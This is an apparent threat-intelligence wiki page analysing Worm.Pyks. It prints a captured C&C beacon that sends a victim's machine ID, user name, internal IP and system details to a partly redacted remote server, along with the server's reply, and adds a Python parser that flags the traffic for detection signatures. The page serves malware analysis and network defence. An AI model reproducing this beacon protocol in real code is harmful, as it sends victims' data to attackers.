Worm.Pyks

Sample submitted anonymously; it was reportedly being pushed via Skype. It has an unusual C&C mechanism: HTTP based, but it pushes its data in multipart form POSTs rather than in URL variables as we'd normally see. The POSTs carry a distinctive User-Agent, and for now the sigs match only on that. Hopefully we'll find something else to key on.

Below is a sample of the C&C data push, followed by the server's response:

POST /ucps.php HTTP/1.1
Host: 67.29.130.xxx
User-Agent: h9tslbw0
Content-type: multipart/form-data; boundary=---------------------------zsTM3KE6QiueEnyt
Content-Length: 1115
Connection: close

-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="id"

HOME-KJZCRW7Q7Qxxxxxxxx
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="upt"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="mode"

1
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="version"

2.3.1.0
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="cpu"

2211
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="ram"

256
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="os"

60
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="user"

victim
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="inip"

10.x.x.x
-----------------------------zsTM3KE6QiueEnyt
Content-Disposition: form-data; name="log"



#x:\xxxxx\pyks20070415212728#
=@64.22.77.xx@=
-----------------------------zsTM3KE6QiueEnyt--

HTTP/1.0 200 OK
Date: Sun, 15 Apr 2007 20:43:26 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Disposition: attachment; filename="a.exe"
Content-Length: 10
Content-Type: text/plain; charset=utf-8
Connection: close

Gi3V8u7JfH
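As an added example (not part of the original write-up and not the ET sigs themselves), below is a small Python parser for the beacon above together with the checks a detection engineer would write against it. The User-Agent match is what the sigs key on; the other two checks are heuristics I am assuming here: that the set of form field names (id, upt, mode, version, cpu, ram, os, user, inip, log) is stable across infections, and that a reply carrying an `attachment; filename="a.exe"` disposition over a ten-byte text/plain body that does not start with an MZ header is worth flagging. The sample request and response are reconstructed from the capture on this page with its redactions kept.

```python
"""Parse and flag the Worm.Pyks multipart C&C beacon (added example)."""
import re
from typing import Dict, List, Tuple

# Indicators taken from the capture. The UA is the only thing the ET sigs
# match on; the field-name set is an extra heuristic added here (assumption:
# the worm always sends exactly these form fields).
PYKS_UA = "h9tslbw0"
PYKS_FIELDS = {"id", "upt", "mode", "version", "cpu", "ram", "os", "user", "inip", "log"}

BOUNDARY = "---------------------------zsTM3KE6QiueEnyt"


def _part(name: str, value: str) -> str:
    # One multipart part, CRLF-terminated, as the worm emits it.
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'


# Constructed sample: rebuilt from the capture, redactions kept. The "log"
# value keeps its two leading blank lines exactly as captured.
_BODY = "".join(_part(n, v) for n, v in [
    ("id", "HOME-KJZCRW7Q7Qxxxxxxxx"), ("upt", "60"), ("mode", "1"),
    ("version", "2.3.1.0"), ("cpu", "2211"), ("ram", "256"), ("os", "60"),
    ("user", "victim"), ("inip", "10.x.x.x"),
    ("log", "\r\n\r\n#x:\\xxxxx\\pyks20070415212728#\r\n=@64.22.77.xx@="),
]) + f"--{BOUNDARY}--\r\n"

SAMPLE_REQUEST = (
    "POST /ucps.php HTTP/1.1\r\nHost: 67.29.130.xxx\r\nUser-Agent: h9tslbw0\r\n"
    f"Content-type: multipart/form-data; boundary={BOUNDARY}\r\n"
    f"Content-Length: {len(_BODY)}\r\nConnection: close\r\n\r\n" + _BODY
).encode("latin-1")

SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\nDate: Sun, 15 Apr 2007 20:43:26 GMT\r\n"
    "Server: Apache/2.0.54 (Fedora)\r\nX-Powered-By: PHP/5.0.4\r\n"
    'Content-Disposition: attachment; filename="a.exe"\r\nContent-Length: 10\r\n'
    "Content-Type: text/plain; charset=utf-8\r\nConnection: close\r\n\r\nGi3V8u7JfH"
).encode("latin-1")


def parse_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split an HTTP request or response into start line, headers and body.
    Header names are lower-cased so 'Content-type' and 'Content-Type' match."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, content_type: str) -> Dict[str, bytes]:
    """Return {field name: raw value bytes} for a multipart/form-data body.
    The CRLF before each boundary belongs to the boundary (RFC 2046), so it is
    consumed as part of the delimiter and values are returned byte-exact."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("multipart body without boundary parameter")
    delim = b"\r\n--" + m.group(1).encode("latin-1")
    fields: Dict[str, bytes] = {}
    # Prepend CRLF so the first boundary splits like all the others.
    for part in (b"\r\n" + body).split(delim)[1:]:
        if part.startswith(b"--"):
            break  # closing delimiter
        part_headers, _, value = part[2:].partition(b"\r\n\r\n")  # part[2:] drops CRLF after boundary
        nm = re.search(rb'name="([^"]*)"', part_headers)
        if nm:
            fields[nm.group(1).decode("latin-1")] = value
    return fields


def classify_request(raw: bytes) -> List[str]:
    """Indicators in a request: 'ua' (what the sigs match) and/or 'fields'
    (the full Pyks form-field set; heuristic added here)."""
    start, headers, body = parse_message(raw)
    hits: List[str] = []
    if headers.get("user-agent") == PYKS_UA:
        hits.append("ua")
    ctype = headers.get("content-type", "")
    if start.startswith("POST ") and ctype.lower().startswith("multipart/form-data"):
        try:
            if PYKS_FIELDS <= set(parse_multipart(body, ctype)):
                hits.append("fields")
        except ValueError:
            pass
    return hits


def classify_response(raw: bytes) -> List[str]:
    """Heuristic added here (not from the sigs): an attachment disposition naming
    a .exe whose body does not start with the PE 'MZ' header is a mismatch."""
    _, headers, body = parse_message(raw)
    hits: List[str] = []
    fn = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    if fn and fn.group(1).lower().endswith(".exe") and not body.startswith(b"MZ"):
        hits.append("exe-name-non-pe-body")
    return hits
```

Running `classify_request(SAMPLE_REQUEST)` returns both `ua` and `fields`, and `classify_response(SAMPLE_RESPONSE)` flags the ten-byte "a.exe". Only the UA check reflects what the sigs do; the field-set and response checks are things to test against more samples before turning them into rules, since a C&C author can rename fields far more easily than a rule can be rewritten.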

More detail as we get it.

Related:

2018773 TWikiGuest 2017-08-08 - 01:12
2003588 MattJonkman 2007-04-15 - 23:36
2003589 MattJonkman 2007-04-15 - 23:36

-- MattJonkman - 15 Apr 2007

Topic revision: r3 - 2008-07-11 - MattJonkman